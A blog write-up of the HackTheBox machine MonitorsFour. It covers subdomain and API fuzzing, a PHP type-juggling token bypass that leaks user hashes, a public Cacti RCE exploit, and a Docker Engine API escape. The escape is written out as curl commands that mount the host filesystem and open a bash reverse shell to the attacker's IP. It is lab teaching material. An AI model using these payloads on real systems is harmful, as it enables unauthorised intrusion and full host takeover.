MonitorsFour Writeup (HackTheBox Easy Machine)

-


Overview

MonitorsFour is an easy Windows machine from HackTheBox. Although it’s presented as easy, it can definitely post some problems, but has couple interesting vulnerabilities.

We start by enumeration and discover a subdomain and an API. We abuse type juggling flaw in PHP to access special endpoint that exposes sensitive info about users. Then, we access Cacti dashboard and exploit RCE vulnerability to get a shell.

Next, we identify a Docker environment and Docker version. We find an escape online, mount the entire host filesystem and get access to host OS.


Nmap scan

Starting with the Nmap scan.

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -A 10.10.11.98 -T5             
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-20 10:03 CET
Nmap scan report for monitorsfour.htb (10.10.11.98)
Host is up (0.10s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MonitorsFour - Networking Solutions
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   26.77 ms  10.10.14.1
2   198.38 ms monitorsfour.htb (10.10.11.98)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds

The Nmap scan showed 2 open ports. Port 80 for Nginx PHP web server and port 5985 for WinRM. Don’t forget to add “monitorsfour.htb” domain to your “/etc/hosts” file.


Web enumeration

I visited the website, which promoted MonitorsFour Network Solutions. Wappalyzer plugin found PHP 8.3.27 in the backend from HTTP response header (version disclosure might be helpful).

I ran Gobuster to perform directory fuzzing. Found couple pages, but nothing interesting. Next, I ran FFuF to perform subdomain fuzzing. It found “cacti” subdomain (add it to “/etc/hosts” too).

┌──(root㉿kali)-[/home/kali]
└─# ffuf -u 'http://monitorsfour.htb' -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "HOST: FUZZ.monitorsfour.htb" -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsfour.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.monitorsfour.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1168ms]

Cacti is an open-source network monitoring and graphing tool used primarily to track the performance and health of IT infrastructure over time. (ChatGPT)

When I visited this Cacti website, I got hit with a login panel. But the page discloses to us that Cacti 1.2.28 version is being used.


Discovering hidden file with credentials

Additionally, I tend to run Nikto (website scanner) on web apps, which tests for common vulnerabilities and shows couple useful information. This time, it found “.env” directory which, upon requesting, downloaded mysterious “Untitled.env” file. Funny thing is that most of Kali Linux wordlists do not contain “.env” and thus we didn’t discover this endpoint yet.

The file contained several database-related environment variables, like username and password (likely for internal database), which might be helpful later.


Finding potential Cacti RCE vulnerability

Anytime we get software version information, we should do a quick research to see if there are any public vulnerabilities. Googling “Cacti 1.2.28”, I found arbitrary file creation flaw leading to RCE.

Associated with this CVE, I found this Github repo (https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC) with Python exploit. Unfortunately, we need to be authenticated to perform this attack, so let’s keep this in mind and move on.


Discovering API endpoints & exploiting type juggling in PHP

Also, the original website had a login page as well. So I tried couple common default credentials but got no luck. If you intercept the traffic with tools like Burp Suite, Caido or browser Devtools, you’ll see that the website sends POST requests to “/api/v1/auth” endpoint. So we have an API which we can enumerate, which is a great finding.

login POST requests are being sent to API endpoint

I used Gobuster to perform the API fuzzing. It found couple endpoints, but the most interesting ones were “/user” and “/users” endpoints.

┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://monitorsfour.htb/api/v1" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 64 -r 
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://monitorsfour.htb/api/v1
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/user                 (Status: 200) [Size: 35]
/users                (Status: 200) [Size: 35]
/logout               (Status: 200) [Size: 4340]
/auth                 (Status: 405) [Size: 0]
/reset                (Status: 405) [Size: 0]


For intercepting network traffic, I like to use Caido but you can use Burp Suite of course. Our next goal is to extract information from this API.

BUT, I got stuck during my walkthrough here. To the point when I had to look at a writeup. I found this Medium article (https://medium.com/@rahaliashraf732/hackthebox-monitorsfour-4859add0b51c) by “rahaliashraf732”, where they explain the right attack path.

It is explained that since we’re dealing with PHP 8.x, there’s a possibility of Type Juggling flaw. Which means that PHP can misinterpret certain types of values (PHP is a loosely-typed language). In practice, backend code might let through something that it shouldn’t.

This was totally new concept for me, so I had a discussion with ChatGPT about it. Apparently, this is a common flaw across most of PHP versions.


Why am I telling you this? Let’s go back to our API, specifically to “/users” endpoint. When we try to reach it, we are asked to send token too.

Now, we can use fuzzing tools like FFuF to spray random tokens, or we can exploit the Type Juggling vulnerability. Wordlists from PayloadsAllTheThings Github repo are very helpful for this attack. But are not necessary in this exact case.

Trying the simplest payloads first, we find out that simple ‘0’ does the job and tricks the backend to give us the list of all users. There were 4 users to be exact, each with their password hash, role, token etc.

type-juggled token allows us to pass the security check

Looking at the tokens, we can guess which token we got mistaken for. There’s token which starts with “0e”, which is mentioned above in Type Juggling explanation.


Accessing Cacti dashboard, exploiting RCE vulnerability & getting user flag

Having 4 hashes, we can try to crack them. We can crack offline with John or Hashcat, or use online tool CrackStation.

Just as that, we managed to crack password of user “admin”.

Now we have valid pair of credentials. Best thing to do, is to spray those across all the services we know about. Using them on main website, we got access to MonitorsFour dashboard.

We can’t use the same creds to access Cacti.

Looking at the list of users, we can find Admin’s full name.

To make progress, we have to be a little creative here. Taking into account Admin’s real name, we can use username “marcus” to get past Cacti login page and access the dashboard.


And hey! We are authenticated to Cacti. Do you remember the vulnerability we found earlier? We can now finally get initial access.

TLDR; we can abuse Cacti graph creation to create arbitrary PHP scripts. Thus, getting code execution.

I set up my listener and ran the exploit with appropriate parameters.

┌──(kali㉿kali)-[~]
└─$ python3 exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i 10.10.15.204 -l 1234
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: hzD8m.php
[+] Got payload: /bash
[i] Created PHP filename: wef3R.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80

And I got the shell as “www-data”.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.15.204] from (UNKNOWN) [10.10.11.98] 52030
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
www-data@821fbd6a43fa:~/html/cacti$

There was one user “marcus”. The user flag waits in his home directory.

www-data@821fbd6a43fa:~/html/cacti$ cd /home/marcus
cd /home/marcus/
www-data@821fbd6a43fa:/home/marcus$ ls -la
ls -la
total 28
drwxr-xr-x 1 marcus marcus 4096 Dec 22 04:04 .
drwxr-xr-x 1 root   root   4096 Nov 10 16:15 ..
-rw-r--r-- 1 marcus marcus  220 Jul 30 19:28 .bash_logout
-rw-r--r-- 1 marcus marcus 3526 Jul 30 19:28 .bashrc
-rw-r--r-- 1 marcus marcus  807 Jul 30 19:28 .profile
-r-xr-xr-x 1 root   root     34 Dec 22 04:01 user.txt


Escaping Docker container, mounting the host filesystem & getting root flag

It would be nice to compromise users with elevated privilege. Nevertheless, if we look at the root, we can see that we’re trapped in a Docker container.

Looking back at MonitorsFour dashboard, we can find that Docker 4.44.2 is being used.

Docker version hinted in the Changelog


Again, while doing vulnerability research, we can find Docker escape exploit.

TLDR; this escape is allowed by unauthenticated access to Docker Engine API. We can create privileged container and mount the entire host filesystem on it.

The Docker API should be accessible on “192.168.65.7:2375”. We can try to reach it with “curl” in our shell for confirmation.

www-data@821fbd6a43fa:/$ curl http://192.168.65.7:2375
curl http://192.168.65.7:2375
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    29    0    29    0     0   7257      0 --:--:-- --:--:-- --:--:--  9666
{"message":"page not found"}

An idea would be to transfer the exploit onto the target machine and run it. Unfortunately, this Docker container doesn’t have essential tools like Python nor Wget installed.

So we have to exploit it manually with Curl. I read the Python exploit, read couple other articles on this Docker escape, even took another peak at writeup.

After a lot of trial and error, I ended up with working payload. Our plan is twofold. Create new container with the entire filesystem mounted, plus with start-up command that gives us a shell:

www-data@821fbd6a43fa:/$ curl -X POST -H "Content-Type: application/json" \
curl -X POST -H "Content-Type: application/json" \
> -d '{"Image":"alpine","Cmd":["sh","-c","chroot /host /bin/bash -c \"bash -i >& /dev/tcp/10.10.15.204/4444 0>&1\""],"HostConfig":{"Binds":["/:/host"]}}' \
<444 0>&1\""],"HostConfig":{"Binds":["/:/host"]}}' \
> http://192.168.65.7:2375/containers/create
http://192.168.65.7:2375/containers/create
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   234    0    88  100   146    141    233 --:--:-- --:--:-- --:--:--   375
{"Id":"84d2fe7bbc39588f52424a2e8e24365d87d5b568ff7fa60556d0aa91ccedfd0a","Warnings":[]}

Next, start this container with it’s specific ID:

www-data@821fbd6a43fa:/$ curl -X POST http://192.168.65.7:2375/containers/84d2fe7bbc39/start
<p://192.168.65.7:2375/containers/84d2fe7bbc39/start
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0


And our listener should receive a connection. We finally got the Root shell!

┌──(root㉿kali)-[/home/kali]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.204] from (UNKNOWN) [10.10.11.98] 49645
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@84d2fe7bbc39:/# id
id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

The root flag sits on Administrator’s Desktop.

root@84d2fe7bbc39:/mnt/host/c/Users/Administrator# ls -la Desktop
ls -la Desktop
total 0
drwxrwxrwx 1 root root 4096 Nov 10 17:54 .
drwxrwxrwx 1 root root 4096 Nov  3 12:05 ..
-rwxrwxrwx 1 root root  282 Mar 24  2025 desktop.ini
-r-xr-xr-x 1 root root   34 Dec 22 10:22 root.txt

And that’s the MonitorsFour machine done!


Summary & final thoughts

MonitorsFour is an easy Windows machine from HackTheBox. This box has several cool stuff like API enumeration and Docker escaping, but is a bit confusing at times, at least for me. We find a lot of things during enumeration and don’t know exactly what to focus on. After PHP type juggling, which is quite unique in CTFs, we get access to credentials. We use public exploit to get initial foothold and land in Docker container. We are limited to only couple binaries, which makes the following escape a bit difficult.

In my opinion, maybe this machine shouldn’t be rated as easy. The vulnerabilities are fun, but the circumstances make it harder to exploit. Beginners might get stuck due to un-straight-forwardness of the machine. Overall, I gave it 3 stars. Probably best suited for intermediate hackers with experience and tough nerves. Definitely feels good once completed, though.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more